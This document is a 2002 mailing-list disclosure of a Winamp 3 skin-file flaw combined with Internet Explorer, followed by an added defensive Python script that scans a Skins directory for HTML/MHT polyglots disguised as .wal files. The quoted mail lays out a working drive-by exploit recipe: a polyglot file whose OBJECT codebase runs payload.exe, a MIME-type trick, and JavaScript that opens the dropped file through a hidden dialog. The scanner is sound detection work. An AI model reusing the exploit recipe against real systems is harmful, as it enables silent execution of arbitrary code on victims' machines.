From: "Jelmer" <[EMAIL PROTECTED]>
Sent: Sunday, August 11, 2002 1:28 AM
Subject: newly released winamp 3 fails to address serious "execution of arbitrary code" issue when combined with MSIE6

> For those of you who have been living under a rock: winamp 3 final was
> released today. It features freeform skins, now plays videos, allows you to
> manage your mp3s and a lot more.
> Unfortunately they failed to address a pretty serious arbitrary code
> vulnerability when combined with Internet Explorer that I reported to them
> and this list earlier for winamp 2. I haven't heard from them since.
> Winamp 3 uses a new skinning system that uses the .wal extension; this
> type is also opened automatically in MSIE, it doesn't prompt for download
> and stores the file in a known location on the user's hard disk, namely
> C:\Program Files\Winamp3\Skins
> (when installed in the default location, like most people do)
> Working exploit code is available at
> Note that this version DOES NOT use any unpatched MSIE hole to invoke the
> executable and it will continue to work even after Microsoft patches its
> browser.
> As I understand it this is just the way the object tag behaves in the
> zone (which seems very very dangerous to me).
> I also updated the winamp2 exploit code at
> Ok, to encourage winamp/aol to take their customers' security a bit more
> seriously, here's "the recipe" for how it's done.
> It's kind of http-equiv-esque in length and obscurity and may not be for
> the faint of heart.
> It's written from the top of my head, so please forgive me if I missed a
> brace or dot here and there. Here goes.
> create a directory c:\exploit
> place an exe file in it, let's call it payload.exe
> then create a file called exploit.htm and give it the following contents
> <html>
> <body>
> <img src="payload.exe">
> </body>
> </html>
> open the file in Internet Explorer, choose File > Save As, and save it as
> exploit.mht
> open it in notepad and add the following line to the top: <html style="display:none;">
> so it looks like this:
> <html style="display:none;">
> From: <Saved by Microsoft Internet Explorer 5>
> Subject:
> Date: Mon, 5 Aug 2002 18:30:03 +0200
> MIME-Version: 1.0
> Then look for the body section of this html document (it looks a little
> mangled), delete everything between the body tags and place an object tag
> in its place, so it looks like this:
> <META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR></HEAD>
> <BODY>
> <OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
> exploit/payload.exe"></OBJECT>
> </BODY></HTML>
> this is the code that will later be used to invoke our executable.
> What we have done is slightly alter the mht file so that it can be viewed
> both as an html and as an mht file.
> Files starting with an <html> tag are always seen as html files in
> explorer (which can be a pain, as will be described below).
> Ok, we are set to go, now we want to place this on the user's hard disk.
> We know wal files are opened automatically by winamp3 and placed in a known
> location, so we'll rename our exploit.mht file to .wal.
> Unfortunately Internet Explorer disrespects mime types, so by having added a
> <html> tag to the mht file it tries to open it as an html file.
> The only way I found around this is to set the mime type to a value MSIE
> doesn't know. I chose x-foo/x-bar.
> If you are using apache you can add the following to your mime.types file
> x-foo/x-bar                     wal
> this means that the webserver will pass this mime type along with every
> requested file ending in .wal
> when we now request this file it will be opened by winamp3 and an
> error message will follow shortly, however at that time it is already too
> late: our exploit.wal file has been placed in
> C:\Program Files\Winamp3\Skins\exploit.wal
> now all that remains is bringing it together by making the following
> sequence of events occur:
> 1. download our exploit.wal
> 2. wait a few seconds for it to finish downloading, then call exploit.wal
> as an html file (the file also doubles as an mht file and the object tag
> included in the html portion points to itself as the codebase)
> here's the code for this:
> <html>
> <body>
> Waiting for 5 seconds..
> <!-- download our renamed mht file and place it on the users disk -->
> <iframe src="amp.wal" style="display:none"></iframe>
> <script language="javascript">
> //wait for 5 seconds
> setTimeout("ExecuteFile()",5000);
> function ExecuteFile() {
>  // open the saved wal file as html file
>  // oddly when called from disk it didn't open it as html file so we need to
>  // force this behaviour by using a modeless dialog
>  sHTML = 'file:///C:/Program%20Files/Winamp3/Skins/amp.wal';
>  sFeatures = 'dialogLeft: 0px; dialogTop: 0px; dialogWidth: 0px; dialogheight: 0px; status:no; unadorned:yes; help:no';
>  vReturnValue = window.showModelessDialog(sHTML, '', sFeatures);
> }
> </script>
> </body>
> </html>
> have fun
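The defensive side of the technique Jelmer describes: the attack depends on a file that is not a skin at all being dropped into the Skins directory under a .wal name. The script below is an added example (my code, not from the mail or from Nullsoft) that checks a Skins directory for .wal files which are not archives and which carry HTML/MHT markers, so an administrator or a scanner can detect a smuggled document sitting where the browser can later reach it. It assumes a genuine Winamp 3 skin is a ZIP archive (PK signature); the sample files, `GOOD_SKIN` and `POLYGLOT`, are constructed inline and contain no payload.

```python
"""Flag .wal files in a Winamp 3 Skins directory that are not real skins.

Added example, not from the original mail. Assumption: a genuine .wal skin
is a ZIP archive (PK\x03\x04 signature). Anything else that also carries
HTML/MHT markers is reported as a smuggled document.
"""
from __future__ import annotations

import os
import re
import tempfile

ZIP_MAGIC = b"PK\x03\x04"

# Markers of an HTML/MHT polyglot of the shape the mail describes.
HTML_MARKERS = (
    re.compile(rb"<\s*html", re.I),
    re.compile(rb"^MIME-Version:", re.I | re.M),
    re.compile(rb"<\s*object[^>]*classid", re.I),
    re.compile(rb"file:///", re.I),
)


def classify_wal(data: bytes) -> tuple[str, list[str]]:
    """Return ('ok', []) for a ZIP-based skin, otherwise
    ('suspicious', [reasons]) naming each marker that matched."""
    if data[:4] == ZIP_MAGIC:
        return "ok", []
    reasons = ["not a ZIP archive"]
    for pat in HTML_MARKERS:
        if pat.search(data):
            reasons.append("contains " + pat.pattern.decode())
    return "suspicious", reasons


def scan_skins_dir(path: str) -> dict[str, list[str]]:
    """Map each .wal file under path that is not a real skin to its reasons."""
    findings: dict[str, list[str]] = {}
    for name in os.listdir(path):
        if not name.lower().endswith(".wal"):
            continue
        with open(os.path.join(path, name), "rb") as fh:
            head = fh.read(64 * 1024)  # the markers sit in the first few KB
        verdict, reasons = classify_wal(head)
        if verdict != "ok":
            findings[name] = reasons
    return findings


# Constructed samples: a minimal ZIP local-file header, and an HTML/MHT
# polyglot shaped like the one in the mail (no codebase, no payload).
GOOD_SKIN = ZIP_MAGIC + b"\x14\x00" + b"\x00" * 26 + b"skin.xml"
POLYGLOT = (
    b'<html style="display:none;">\r\n'
    b"From: <Saved by Microsoft Internet Explorer 5>\r\n"
    b"MIME-Version: 1.0\r\n\r\n"
    b'<BODY><OBJECT NAME="X" '
    b'CLASSID="CLSID:00000000-0000-0000-0000-000000000000"></OBJECT>'
    b"</BODY></HTML>"
)


def demo() -> dict[str, list[str]]:
    """Write the constructed samples to a temp Skins dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "good.wal"), "wb") as fh:
            fh.write(GOOD_SKIN)
        with open(os.path.join(d, "amp.wal"), "wb") as fh:
            fh.write(POLYGLOT)
        with open(os.path.join(d, "notes.txt"), "wb") as fh:
            fh.write(b"<html>")  # wrong extension: not a .wal, ignored
        return scan_skins_dir(d)


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(f"{name}: {'; '.join(reasons)}")
```

Run against the real directory (`scan_skins_dir(r"C:\Program Files\Winamp3\Skins")`) the check reports only non-archive files with HTML markers, so a corrupt download without those markers is still shown as "not a ZIP archive" but with no further reasons. Checking the magic bytes rather than the extension is the general lesson: the mail's trick works precisely because both the browser and the player trusted the name and the server-supplied type instead of the content.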
